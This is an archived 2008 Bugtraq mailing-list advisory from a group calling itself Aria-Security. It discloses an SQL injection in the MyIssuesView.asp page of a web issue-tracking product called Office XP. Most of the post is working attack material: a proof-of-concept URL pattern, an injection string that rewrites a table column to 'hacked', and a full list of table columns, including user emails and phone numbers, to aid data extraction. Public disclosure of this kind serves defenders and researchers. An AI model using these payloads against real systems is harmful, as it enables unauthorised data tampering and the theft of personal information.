[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Office XP Remote SQL Injection
From:       no-reply () Aria-security ! net
Date:       2008-03-13 17:32:04
Message-ID: 20080313173204.7436.qmail () securityfocus ! com
[Download RAW message or body]

Aria-Security Team (Persian Security Network)
http://forum.Aria-Security.com (ENGLISH FORUM!)
--------------------------------------------------
Shoutz: Aura, Null, Kinglet
Office XP Remote SQL Injection
Vendor: vso-xp.com
Vulnerable File: MyIssuesView.asp
Original Adivosry: http://forum.aria-security.com/showthread.php?p=21

PoC:
MyIssuesView.asp?Issue_ID=[SQL INJECTION]

Examples:
MyIssuesView.asp?Issue_ID=-1%20having%201=1--
MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';--


List of columns

QIssues.Issue_ID,QIssues.UserID,QIssues.Date,QIssues.Synopsis,QIssues.Status,QIssues.C \
ategory,QIssues.Category_ID,QIssues.Status_ID,QIssues.Priority,QIssues.Staff_ID,QIssue \
s.Description,QIssues.IssueDescription,QIssues.LastStatus_ID,QIssues.UserFullName,QIss \
ues.StaffFullName,QIssues.StaffEmail,QIssues.Type,QIssues.Priority_ID,QIssues.Group_ID \
,QIssues.UserEmail,QIssues.GroupName,QIssues.UserPhone,QIssues.CloseDate,QIssues.Brows \
erAgent,QIssues.CompanyName,QIssues.FileName,QIssues.FilePath,QIssues.CustomFields,QIssues.CloseBy,QIssues.Age



Aria-Security Team
The-0utl4w


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic